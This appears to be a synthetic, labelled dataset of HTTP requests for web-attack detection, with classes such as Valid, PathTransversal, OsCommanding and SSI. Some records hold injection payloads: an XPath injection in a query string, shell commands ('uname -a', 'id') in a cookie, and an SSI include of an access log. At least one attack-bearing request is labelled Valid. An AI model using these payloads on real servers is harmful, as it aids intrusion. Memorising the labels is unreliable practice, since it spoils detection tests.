GET /y9/u6Ocoaasge/nkR/mtezEdlainiesDtaa/aSKautoexeceb/aiozri/t-O7f6Ym/n0/eney8oE/s5SBd1Yc/processing-instruction2_S7Y/dfmsredntoen0elr.tiff?Ener39mDf8Utrr=snps&uumIr=net%3AUioeuhiphh8n4+0&nQQetc=ti%27+or+++++d%2FcEdanh%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D4%5D+++++or++++%271eUmaaeS%27+%3D++++%27 HTTP/1.0
Host: www.riurL6eJV.net
Connection: ithmSo
Accept: audio/x-wav, text/xml;q=0.5
Accept-Charset: utf-7, euc-tw, iso-8859-1, windows-1251, iso-8859-9
Accept-Encoding: 
Accept-Language: r-mear6an;q=0.1, scpr-ttesa, aaa-dp, eoare-unabg;q=0.8, sqaauhIo-d
Cache-Control: max-age=004
Client-ip: 46.208.216.230
Cookie: 9LtelnetdH=awnoehOs;_RPdb=an>ti);oecer=te%%o/laccepti7dsv;7oztri=altsee0wneRtr=8crw;Crgestte1edglj=c@S-wnTagit
Cookie2: $Version="34"
Date: Fri, 04 May 07 05:55:12 UTC
ETag: "-PkzT_C75R64usx5m"
Expect: shiNeesn=gk8dcin
If-Modified-Since: Mon, 20 Jul 09 22:26:40 UTC
If-Unmodified-Since: Mon, 25 Jan 10 09:46:26 UTC
If-Match: "VgRM.hzWFWwvjV@43"
If-None-Match: *
If-Range: "37q_00X1Gk@yBjxEQeY"
Max-Forwards: 80
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: NTLM d2Rha2V0dHZsd3NyZmVzc25Ub25jaW5lZGVrc3RvZWttckpFbmN1c2w=
Authorization: ia3b sara=5iwwpoh5
Range: 66338-
Referer: /DeT8/i9CheHa.msf
Trailer: Max-Forwards
User-Agent: Mozilla/3.6 (Machintosh; U; PPC Mac OS X 3.6; C1-oa; rv:6.3.4) Gecko/88571023
UA-CPU: MIPS
UA-Disp: 3308,0110,8
Via: 3.3 80.7.64.89, 6.5 www.oo6aobll.jpg
Transfer-Encoding: gzip
Upgrade: iEnTvf/9.1
X-Serial-Number: 2013029504
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49909
Start - Id: 18311
class: Valid
GET /c7gv0jz8c/ntrNKPw/selectbinZH@FWaccess_log1/ehofryoni/rJ4nhV/oj.I2UIoJYk/roGwzzdTrPwiw/hoedaea39h5xMP/iQ.jpg?M.Egpassthru=hnahinsi&dKlMs6iq=rHAwnvrij&hinrhobr=80 HTTP/1.0
Host: 220.200.0.14
Connection: close
Accept: application/x-tar;q=0.6
Accept-Charset: *
Accept-Encoding: compress
Accept-Language: tgsa5ad-loaaSuc;q=0.2, dil-ppSsCr
Cache-Control: max-age=85138
Client-ip: 34.186.224.238
Cookie: 0iial=biN0T;of2s=iYZW0OMU;system.vjlz@Yqn=pgk8;yUliztqrote=h_kDqFaJR
Cookie2: $Version="4"
Date: Wed, 13 Jun 07 09:13:27 UTC
ETag: "fKZ8peuxgdq_2ugbR"
Expect: rvsav2=sltuna;ndynn
From: gstN@lnddoWhdmn.fr
If-Modified-Since: Tue, 16 Feb 10 24:04:07 UTC
If-Unmodified-Since: Sun, 10 Oct 04 04:42:02 CET
If-Match: "fN2I1Y-Zpm1WvFijMDHW"
If-None-Match: "JbLHZ.FIdzc5-hp"
If-Range: "W8u0OBPc8E7yB9rM."
Max-Forwards: 85
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: NTLM dWVhM3Joc3d4YXJ0YW9udVNhdEx4aWVtZWhkYWFoYXRhYmFpTA==
Authorization: Digest algorithm=MD5
Range: 33-392,-2077,7-8592
Referer: /TMst6C/ahebwas/SMdhe.msf
TE: gzip;q=0.2,deflate,trailers
Trailer: Max-Forwards
User-Agent: mhotjj8sa (hcESbmsKR)
UA-CPU: x86
UA-Disp: 967,4917,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0744x394
Via: Nwrmy/8.7 www.vennx.jpg, 5.0 www.aAsaewu.js
Transfer-Encoding: gzip
Upgrade: tlt/9.6
Warning: 514 67.147.194.108 "eiekiaraEa6" "Fri, 07 Oct 05 14:36:56 GMT"
X-Forwarded-For: 44.250.109.77
X-Serial-Number: 31774201
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18311
Start - Id: 150
class: Valid
GET /5yyBpYxdtoUsybbC/hwxfcccitr0b8dvntei/aeoapEnEt6ikooEtdush/3wLkoYZBZg0vQs/atte/laernn/eNat6e5r1ha/Rereoitat.js?ey7gesmbou=21306170&H@andZjh=a&oecc2t84sam1dh=in2&ieph=rmu1awaindocumentecho+includekvnoa%3Eo&1WqBN6f085O3=692426&nbaertntaq=yui70tifYA1ocss&bNo=615395&ssa9s4Nc=cnH&oqqdilpeg=oZc&sGqy9pD6RM5=otcwuag&lghilIenZd9rton=O3tyDwoz&eyrNnr9eeuaaron=idibadmini%7EDe%26lf%29ri%25eo%3A&oZEhSgori=ezfsoiTale4&veichEatideo=ohOxbman HTTP/1.1
Host: www.lttti.be:3277
Connection: keep-alive
Accept: image/jpeg, application/rtf
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: 5eigfh-hywpay
Cache-Control: max-age=33996
Client-ip: 22.184.240.161
Cookie: Woya=lc1q_ti.La
Cookie2: $Version="4"
Date: Sun, 30 Mar 08 21:10:52 UTC
ETag: W/"SRmbQGNVW5iNXBP"
Expect: 100-continue
From: yiboT07e@nnhseug2l.org
If-Modified-Since: Wed, 04 May 05 17:42:00 GMT
If-Unmodified-Since: Wed, 11 Jan 06 02:19:51 UTC
If-Match: "aLhB_Gf@Ik06nkOpmO7v"
If-None-Match: "pAlj9m.4J1bGflUz"
If-Range: *
Max-Forwards: 346
MIME-Version: 7.2
Pragma: Tateh='enQrn7'
Proxy-Authorization: NTLM ZWhCaGFoOUZlZXNOZW5pOWRkNHRtOG9sbHNkZXNRaUdlUg==
Authorization: NTLM bzkxbWJhZU10c2hnc2g4cmNjbmxjdHVkbGhvYWF0WjhtZWppZWZOc2llZWVw
Range: 964-,534023-,-60428
Referer: http://www.lcuroe.de/aKbdv/irrloaa/DplSlw/cdo4ye.tar
TE: gzip
Trailer: Accept
User-Agent: inxxtisr/0.8
UA-CPU: MIPS
UA-Disp: 1257,262,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 167x694
Via: fye7/2.4 57.21.246.118, 5.4 151.94.135.49, FTP/0.6 www.eadat.jpg:7
Transfer-Encoding: deflate
Upgrade: 3ilhh/7.5, sclai/5.5, chnnyw/6.6, nlh/5.8, Fmk/0.2
Warning: 154 www.hcosnooA.png "taactmae" "Thu, 01 Oct 09 07:27:56 GMT"
X-Forwarded-For: 22.86.234.213
X-Serial-Number: 3449007851195603
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 150
Start - Id: 45209
class: PathTransversal
GET ////? HTTP/1.1
Host: www.ehnIiP.be:907
Connection: yOetro
Accept: application/*;q=0.7, application/*, image/png
Accept-Charset: windows-1255, gb2312;q=0.9, windows-1250;q=0.0
Accept-Encoding: gzip, compress;q=0.7
Accept-Language: 5-ae;q=0.7, eb-Pib, hrkd-ctrOs
Cache-Control: max-age=824
Client-ip: 125.250.245.160
Cookie: sAF%uqfi=reaccess_logftpme
Cookie2: $Version="5"
Date: Thu, 14 Aug 08 22:31:28 CET
ETag: W/"_42@pBjVbX4bYLjRIkl"
Expect: oq0ewer7
From: 1p4rry@estl2a.org
If-Modified-Since: Mon, 07 Aug 06 06:36:56 UTC
If-Unmodified-Since: Fri, 15 Aug 08 13:27:35 CET
If-Match: "uWjapukWjRUFRGf1"
If-None-Match: "ql1LzEgDmoYabfZ.U"
If-Range: Fri, 07 Sep 07 22:02:20 CET
Max-Forwards: 27
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: uvaesU naapebE=ehpe
Authorization: NTLM dG56RWllc2hvczZub05hbzhhaXNwcjd0YWV5bmk3b2xy
Range: 706278-,584316-,-67
Referer: http://www.lrrysss.gov/fAmo/gr8qstua/ihtrdhm1.jpg
TE: trailers,chunked;q=0.8
Trailer: User-Agent
User-Agent: Mozilla/4.5 (Windows; U; Windows NT 2.8; fE-ae; rv:7.7.9) Gecko/92933492
UA-CPU: Sparc
UA-Disp: 675,5988,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 512x1619
Via: FTP/1.0 www.nesDsdad.js:89, FTP/4.6 36.194.95.194, 4.1 134.5.100.143
Transfer-Encoding: deflate
Upgrade: botOA/6.4, hiei4a/3.6, u8Qat/8.0
Warning: 342 www.bgya.css "oc3o7d" 
X-Forwarded-For: 157.255.96.148
X-Serial-Number: 706890452941318
----: -------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 45209
Start - Id: 36843
class: OsCommanding
POST /oednoaurtmthwb7e7t/zyhORGJ/lO/ty7eroeaxnoednineyia/RS3%uONqq@qYosuI.php3? HTTP/1.0
Content-Length: 105
Content-Language: Ph9ab,eh,9ot2
Content-Encoding: gzip
Content-Location: /ipis/gnLn/Gh2Co/ZAeafB/iuotan.conf
Content-MD5: c2Vobm5sM2lPeW91YjJBNA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 02 Nov 04 02:16:35 GMT
Last-Modified: Fri, 05 Dec 08 13:32:21 CET
Host: www.e71tnhaoo.be:25
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *
Client-ip: 114.22.10.232
Cookie: uaiotSoy6ele=0oet~@(;kirl=n0hheBU-oetgh;jesos=;HhpP;tereut5xaeqan0=    ;    echo          ;   w      ;   uname  -a   ;  id;edr=2818213
Date: Sun, 10 Jan 10 12:21:22 CET
ETag: W/"1cvgLSYrEp2A1YP-"
If-Modified-Since: Tue, 13 Jul 04 03:43:39 CET
If-Unmodified-Since: Fri, 04 Jun 04 05:09:34 CET
If-Match: *
If-Range: "it9ECqM8XXSp3ys.A_NP"
Max-Forwards: 7
MIME-Version: 6.6
Authorization: Digest username="itpEh"
Range: 31396-6586
Referer: http://giniit.fr/oiaswhR/tfodf/csCoott/edllo/rraemT.php4
User-Agent: Mozilla/7.1 (Windows; U; Win98 4.9; rn-be; rv:9.2.5) Gecko/43081064
UA-OS: Windows NT
Via: FTP/0.7 www.iRttdmc.js
Transfer-Encoding: identity
X-Serial-Number: 8834777975735637485

cb=sam&lame2WCioqh=8936&jnUCreOnofnasws=4&loet23okme240m=iapKT7ON@i-s&Msystem0_v7g=RunIt&id1Lnyn=hlsDca

End - Id: 36843
Start - Id: 30823
class: Valid
GET /70oOZaje.SAGUXRIgcl/rv/MallC6tE_vM/r3._yrMupPLej/hgfSLbsjgGHvifUyXL/ixp_/te19A_CYGb/oSw/sj5Y7LbI/Xt/ZdFW/inhynm.pl?sbis=yV3bn3Y0k&danammea=tonlumastmIdbte2&eJu9ek=3472&xwR4yrf=9100415690&jsit=Eisej&antiAta4ns=diciq%3Dcet%26as&2ion=034&tu53ztaw=r&0oe3e=8801&all@IG1group byOa-yyP=-+1&styleUUE=sXv68 HTTP/1.1
Host: 146.113.88.111:80
Connection: close
Accept: */*;q=0.6
Accept-Charset: iso-8859-15, iso-8859-9, iso-8859-7;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 32.44.120.32
Cookie: eydittdIzUakrs=77583;ni7nti2ntwe=ts@18;xdooiersne=rnlFsOymlwsriyI
Cookie2: $Version="820"
Date: Fri, 24 Mar 06 16:59:38 CET
ETag: W/"xJLOq7EdNeNcmU0"
Expect: 100-continue
From: atr4n8@erh1g.biz
If-Modified-Since: Thu, 26 Oct 06 02:00:35 UTC
If-Unmodified-Since: Wed, 18 Feb 09 03:55:27 GMT
If-Match: *
If-None-Match: *
If-Range: "Nw8ZgCe_RKzlfqhfoPa"
Max-Forwards: 5516
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Bb9d hdnpTo6=rnIfs
Authorization: NTLM amJlbmFlYXQ2bXl3YW5lMmFUbmVkVjFhbW5hYUVvaHlKOXNlbHRoT2Vtc3FycmU=
Range: -183
Referer: /hrTnt/Rlheii/m4sBa/oemt/eehacg.mdb
TE: trailers,trailers
Trailer: Connection
User-Agent: Mozilla/5.4 (Windows; U; Win 9x 6.9; ie-Dc; rv:7.0.8) Gecko/99009930
UA-CPU: PowerPC
UA-Disp: 0706,772,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 394x7856
Via: 2.1 www.cefq.css:1187, 2.6 185.25.129.5:922
Transfer-Encoding: gzip
Upgrade: hnx/7.3
Warning: 313 www.hlalfjmb.js "rqeAssmteih" "Fri, 24 Mar 06 15:57:48 CET"
X-Forwarded-For: 37.25.72.3
X-Serial-Number: 23620513088799
----: ----------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 30823
Start - Id: 28046
class: Valid
GET /aOednta/tagesaulP/eBwo.asp?r0raeoXEgemRz=28&mpnrte=qcroS&elt0r=%7Eteq%24 HTTP/1.1
Host: www.frnodn.it:9
Connection: close
Accept: video/quicktime, audio/*, text/plain
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 218.33.30.72
Cookie: yoi0ORg1w=914;Sanefi=ea75$iy;8Z4nconnectqP=sntxmlechoAlfiudx
Cookie2: $Version="13"
Date: Mon, 21 Jan 08 05:48:04 CET
ETag: W/"8p1XGA.Gdu1L5dMF8FYG"
Expect: 100-continue
From: gu9cDaia@ar6it9.st
If-Modified-Since: Fri, 19 Jun 09 04:08:10 UTC
If-Unmodified-Since: Fri, 26 Aug 05 16:41:35 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 28 May 04 19:55:07 UTC
Max-Forwards: 2959
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Basic Yjllbndob2w6dHIxcmU=
Authorization: Basic c2lTZTp0b3VhbnI=
Range: -570
Referer: /auhswp/bdxi4B.js
TE: chunked;q=0.7,deflate;q=0.9
Trailer: Range
User-Agent: penxbdhexue
UA-CPU: Sparc
UA-Disp: 352,634,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 4477x7117
Via: FTP/0.0 www.7ida2sdt.png
Transfer-Encoding: gzip
Upgrade: oe2lo1/5.5, meme/3.9, dxyas/2.0
Warning: 759 www.rcgyueh.tiff:5 "wolidasoknadsaeahf" "Sun, 27 Jul 08 14:28:37 UTC"
X-Forwarded-For: 140.27.28.161
X-Serial-Number: 769134
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28046
Start - Id: 39714
class: SSI
GET /7wqhjSlzJP@1nb/asietfdle23iimtai/1lnr2serviceshzLs/j_bBmailftpFRQFex/herineNa1seni6naa.tiff?retbu45iw=tgs02vstHfn1tSEa&zSBs86m=n+a%27r&ttwt=%3C%21--+%23include+++++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22--%3E&odhxrkitman=t%3C%29o&eTeus2tSkTr=77989271&rlpEms4a=85997&olnir=304450866 HTTP/1.0
Host: www.9sdhas.ch
Connection: keep-alive
Accept: application/*;q=0.4, text/*, audio/*
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.7
Accept-Language: EMcsens-eryaaofy;q=0.0, giies-osdovpr;q=0.6, io-rcro;q=0.6, artpo2i9-nyt8arPS;q=0.2
Cache-Control: no-transform
Client-ip: 215.74.168.109
Cookie: d0krgrd1steskn=oN<stte hcdon;1Lnts8g=siaRi
Cookie2: $Version="1"
Date: Tue, 15 Jun 04 09:12:35 CET
ETag: "S3drG_PYWSBZhlFGgd0W"
Expect: 100-continue
From: raeaLt@0lwi1ioms.it
If-Modified-Since: Sun, 04 Jun 06 03:51:17 GMT
If-Unmodified-Since: Thu, 16 Nov 06 06:34:59 UTC
If-Match: *
If-None-Match: "sxPKoV3rJ.qan7-7SX45"
If-Range: Sun, 29 Jan 06 07:21:27 GMT
Max-Forwards: 2811
MIME-Version: 4.8
Pragma: hlh=roo2gtah
Proxy-Authorization: Digest cnonce="d8sec"
Authorization: Basic cm5kcnM6Ymw1Y29y
Range: 61-,98874-5,222224-
Referer: /ay2poe/tehNMgi.zip
TE: deflate,trailers
Trailer: If-None-Match
User-Agent: Mozilla/3.4 (X11; U; Solaris 5.8; il-et; rv:5.7.6) Gecko/50476873
UA-CPU: Sparc
UA-Disp: 3264,053,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 066x3039
Via: 7.9 www.mcdu.jpeg:89, 9.2 111.204.86.165
Transfer-Encoding: elvsn; 3fhpaat=nhcom
Upgrade: effn/5.2, ajnt/0.1
Warning: 414 39.123.241.242 "diuAtlysh" "Sat, 05 May 07 01:06:17 GMT"
X-Forwarded-For: 227.157.179.153
X-Serial-Number: 9911764547155
----: ------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 39714
Start - Id: 6984
class: Valid
PUT /s3_3oinclude5group byconnectform/hq/m9narype/ESMRVsJiC/AmlhWp5utnRjrt0/e7XjI/0e9tnme4t2nhaOr2/ni6nnmevlpisitesi62h.pl? HTTP/1.0
Content-Length: 259
Content-Language: htmrr,me
Content-Encoding: deflate
Content-Location: http://pkto.com/tctnh3da/7ibd3on/jyat7ost/ep7n/ogdeo.asmx
Content-MD5: cmlveHJyd3Jub3NmdHlhYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 11 Mar 10 19:26:45 GMT
Last-Modified: Tue, 13 Jun 06 08:30:29 CET
Host: 139.15.227.22
Connection: i0eajtdG
Accept: audio/*;q=0.0
Accept-Charset: *
Accept-Encoding: compress, deflate;q=0.0
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 202.128.51.133
Cookie: FSendetpan0lazq=qih9;OWAV0CRIlocationsdocumentS=a7VEEMyh1tqo;syfrn7axiUdvti=rneTecet;am=s xml=xsa
Cookie2: $Version="082"
Date: Thu, 20 Jul 06 03:14:58 GMT
ETag: "uaPBDwaC3KHu6bTvbY"
Expect: CsqnR=aodtm;eo1obyp
From: rcaasa4a@Wrn2iB.ch
If-Modified-Since: Sat, 16 Jun 07 20:53:13 UTC
If-Unmodified-Since: Thu, 15 Jul 04 05:57:25 CET
If-Match: *
If-None-Match: "FyuY78yTRRLY10f"
If-Range: Wed, 14 Nov 07 19:31:48 CET
Max-Forwards: 81
MIME-Version: 0.6
Pragma: ueiihc=undoe4li
Proxy-Authorization: Digest realm
Authorization: gerst oanspld=podfyeCr
Range: 544-,459-
Referer: http://www.e8smu.com/adf8S3o/7mte6oj/eonk.pdf
TE: trailers,trailers
Trailer: Host
User-Agent: Mozilla/9.7 (Machintosh; U; PPC Mac OS X 1.0; m0-7z; rv:0.0.1) Gecko/53894877
UA-CPU: 68000
UA-Disp: 4258,294,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 040x289
Via: 2.3 www.eokli.html, tpgl/4.2 146.164.160.42, 3.3 208.19.81.159
Transfer-Encoding: deflate
Upgrade: n2e/1.3
Warning: 506 www.isxea3en.htm "fCnsiousntr6A9nt" "Thu, 15 Mar 07 14:14:02 CET"
X-Forwarded-For: 183.8.33.32
X-Serial-Number: 95729667
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rcpOdexCGautoexece=7&w8=n ylsku system&eTcsde8eoodeota=n0o&ja4Cscript=n&QQpboot.ini8y-g=CDeYlm35etbo&F5ew0Yz_insertPA=sS&uVCvbscriptt=|onastsle5csssbint$ths&xnrpmlo=efdlo6mo9td %iqlhil&brcuPAEsa=httpstse>&sshntt8tE5cs=As&n5yhc=269127&elht=h_44oHuoTYrX

End - Id: 6984
Start - Id: 15504
class: Valid
GET /f59PISKje8uWZ1-/9A-4iD/ibqtUPHJir.VJf_Z/xdeleteMhLRIpdelete7.jpg? HTTP/1.0
Host: 212.43.205.5
Connection: close
Accept: text/plain, text/html;q=0.0, text/xml
Accept-Charset: x-mac-chinesesimp;q=0.1, windows-1253, x-mac-chinesetrad;q=0.5
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: no-cache
Client-ip: 157.109.106.116
Cookie: eeendeeiwhadshu=Seu;6ydiIsfdsBoiene=d6k;qui=s|sl;aiidturjteeRetf=iy-@le-VkI;vfg=106374
Cookie2: $Version="9"
Date: Tue, 02 Aug 05 08:36:04 GMT
ETag: "_3v6VtLlDAdHJIDC4Jn"
Expect: 100-continue
From: oJs6@aoganier.cz
If-Modified-Since: Thu, 04 Dec 08 05:46:42 UTC
If-Unmodified-Since: Sun, 09 Mar 08 06:58:02 GMT
If-Match: "QbBD5YnbbMJlO4ZG22"
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 4.0
Pragma: oaEooeut=oe0
Proxy-Authorization: drol nltaoan=u5pe
Authorization: Basic bGRhc25lOnRkZXU=
Range: 5-
Referer: /naMshu.mp3
TE: gzip,trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/5.3 (Windows; U; Windows NT 6.0; p2-gh; rv:3.2.5) Gecko/28738895
UA-CPU: Sparc
UA-Disp: 1586,7819,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 398x075
Via: FTP/7.6 www.zehf.htm:994, 1.8 www.odtwr85.jpg, 2.8 www.S9Ionrr.jpg
Transfer-Encoding: blee97; eChirm=srhmhut
Upgrade: aeua/3.9, hNtay/3.8, Hhte/8.2
Warning: 534 234.204.240.11 "otaehneciDctischN" 
X-Forwarded-For: 143.27.31.69
X-Serial-Number: 50575175012766315162
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 15504
Start - Id: 25529
class: Valid
GET /auns/rm/aimImyPqfb/slkDay/mb/ncFgitlsgTlasod9it/icaah.tiff?xcexpptienw=h&sgisevni=iQ%40f6Anc&oqet9feu=1escolbezruem&ypnrt2he8fiedm=wp-oofk+kArE6dla&R32EWn=411&7iie=+te&w6Rynlsdhwre=awubn&ie=eNY7&gIv@bdz=5u.PwjMO4.yz&ceSaeQ.=4999948 HTTP/1.0
Host: www.hea0wk8.it
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 129.240.219.21
Cookie: u8fatea=u%;3tiefiumpi5=55823967;te8=0531
Cookie2: $Version="047"
Date: Mon, 10 Nov 08 21:28:44 UTC
ETag: W/"6W8mgB2arYkFc2za4gY"
Expect: 100-continue
From: ReniNee@zhjiy7o.de
If-Modified-Since: Sun, 26 Oct 08 11:18:16 GMT
If-Unmodified-Since: Fri, 05 May 06 20:27:31 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 52
MIME-Version: 1.0
Pragma: iriRSti=2
Proxy-Authorization: Basic bm9yZzFyOm93c28=
Authorization: r3twH vFoCf=edReq
Range: 667-742
Referer: /s2d5nt/bisLoodr/6dctf.tiff
TE: gzip;q=0.9,trailers,chunked;q=0.8
Trailer: Date
User-Agent: Mozilla/3.1 (X11; U; SunOS sun4u 1.6; ai-2s; rv:7.2.2) Gecko/39139538
UA-CPU: MIPS
UA-Disp: 0020,943,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 5796x493
Via: 4.6 208.168.251.63, n7etr/1.8 38.232.146.200:57
Transfer-Encoding: compress
Upgrade: utH/5.0, httwz/8.8, luydy/3.7, rLo/1.4, iool1/1.7
Warning: 111 118.94.67.31 "uxakonOyb" "Mon, 04 Oct 04 19:54:01 UTC"
X-Forwarded-For: 62.171.11.144
X-Serial-Number: 9918504
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25529
Start - Id: 15760
class: Valid
GET /snn2c6prdtsa/aoiiusxmgeeel8nhnP/teebNrahco9tU/etttrh8soEplelE/neuwa8nwyetaa/tULP0woiK@sj_cCj@CAe/esoaSaif4nsxhn7yl.php? HTTP/1.1
Host: 204.148.206.75
Connection: crVkt
Accept: */*
Accept-Charset: cp-936, x-mac-icelandic, x-mac-chinesesimp;q=0.6
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: no-cache
Client-ip: 195.199.12.74
Cookie: ay9aoe=3;nYS-G1jGWk=17;vtmn=e4Fg5YBI;lectoasz0lo5m=dcoasDeigzdlintn;nl8P=rtaSia;8JidN=wSooMDe-Qex
Cookie2: $Version="9"
Date: Thu, 11 Jan 07 16:39:22 GMT
ETag: W/"8gjWBxU9zw2EktF"
Expect: 100-continue
From: tmcou1ni@As4tTc.be
If-Modified-Since: Thu, 31 May 07 01:34:56 CET
If-Unmodified-Since: Sat, 26 Apr 08 21:56:09 CET
If-Match: ".EOUA7lCfV7zj3Hi9"
If-None-Match: "NDBZjG4buq98467A9J"
If-Range: *
Max-Forwards: 0
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: madpbd sof13=Yestera
Authorization: Digest cnonce="m5da"
Range: 4745-,-48,7-8
Referer: http://www.Enooqb0.org/acmgt.pdf
TE: chunked,chunked,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/9.3 (compatible; Konqueror/0.0; Mac OS X; ilsncera; ditieosoun)
UA-CPU: MIPS
UA-Disp: 238,6520,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 516x1974
Via: HTTP/1.2 www.a6t5.html, 5.2 142.114.64.45, 5.5 25.57.36.242
Transfer-Encoding: deflate
Upgrade: tlub/4.7, hksiTB/4.2, jtoi5n/2.3
Warning: 404 124.90.161.164:454 "uesttf9iRtd" 
X-Forwarded-For: 76.30.185.202
X-Serial-Number: 698228
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15760
Start - Id: 11919
class: Valid
GET /wJ1Kk5FH/XRTTj0ashutdownTxhttpsIhttp_/tpdmULji6g/NGqM6P.jpg? HTTP/1.1
Host: www.Norwige.be
Connection: close
Accept: */*;q=0.8
Accept-Charset: iso-2022-jp;q=0.5, x-mac-ce, koi8-r;q=0.8, iso-8859-3
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 28.135.80.186
Cookie: mHrra1E1oiptmrn=lrn8wai;iotdlobfC=0sb@pedu:E;aRe5TDnuep=456;IHirwrt=657017;nSgoc=pz=i;dihn1itml=uhiex(dhinclude
Cookie2: $Version="8"
Date: Tue, 13 May 08 09:41:59 CET
ETag: "Zwd-lHPSxRrZEPmq_j"
Expect: sgK2
From: rvee8@dNru.biz
If-Modified-Since: Mon, 19 Dec 05 14:28:37 CET
If-Unmodified-Since: Tue, 21 Jul 09 23:38:24 UTC
If-Match: "oLok_eVVP4yz8tP96PF"
If-None-Match: *
If-Range: "Vpr-zJva2xUed7HY"
Max-Forwards: 9237
MIME-Version: 8.1
Pragma: Hisiia1=4ak
Proxy-Authorization: Basic dGllaTc6b2Ezcmx5
Authorization: Basic Q25pYTphYmJ5d2Fp
Range: 1-,-240,665474-
Referer: http://www.aiylc.st/fjrf.mp3
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/4.2 (Machintosh; U; PPC 4.4; nt-hv; rv:1.4.9) Gecko/17225877
UA-CPU: x86
UA-Disp: 566,0698,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 5682x182
Via: FTP/7.0 102.24.141.227, 4.1 94.159.99.121
Transfer-Encoding: gzip
Upgrade: heosIt/7.3, ahu/7.4, meusj/3.1, anau/6.1
Warning: 289 www.Irbdorr.jpeg "eeerr0uart" "Fri, 11 Mar 05 10:40:23 GMT"
X-Forwarded-For: 230.225.78.26
X-Serial-Number: 071844089
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11919
Start - Id: 10681
class: Valid
GET /bTM.php3? HTTP/1.0
Host: 148.130.79.42:9
Connection: close
Accept: image/*, text/*;q=0.5
Accept-Charset: x-mac-japanese;q=0.8, iso-8859-7;q=0.0, x-mac-turkish
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 245.69.51.123
Cookie: wnzett2unaesps=70;t1ca=5;dSyae=gn4aeoitego;lt0l=44064813;iAruosel=ssr;q39SH_gcdlsM=rlhs
Cookie2: $Version="923"
Date: Tue, 02 Nov 04 02:00:11 GMT
ETag: "c7TaWn1qmplrGR5OVY"
Expect: 100-continue
From: spyi@hEtfsnh.ch
If-Modified-Since: Thu, 03 Jan 08 15:58:34 CET
If-Unmodified-Since: Sun, 04 Nov 07 09:40:20 UTC
If-Match: *
If-None-Match: "B3v46AetD8T7Xymw."
If-Range: Thu, 26 Jun 08 20:23:24 GMT
Max-Forwards: 7455
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Basic WXRlb2VoaTp3aGk3bnM=
Authorization: Digest username="eto0dso"
Range: 9268-2780
Referer: http://2tSai.net/8tlbasx.asp
TE: trailers,trailers,chunked;q=0.9
Trailer: Accept-Language
User-Agent: Mozilla/0.4 (Machintosh; U; Mac OS X 7.7; cw-e0; rv:3.7.1) Gecko/84778622
UA-CPU: 68000
UA-Disp: 8769,6775,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 6678x842
Via: 6.6 144.167.5.142:2, FTP/9.2 www.4arsa1ih.tiff:6
Transfer-Encoding: gzip
Upgrade: 7wR38/2.1, n4l/0.4
Warning: 628 www.adro.shtml:8 "wytptersn" 
X-Forwarded-For: 168.27.206.6
X-Serial-Number: 45651300212096623
----: -------------------
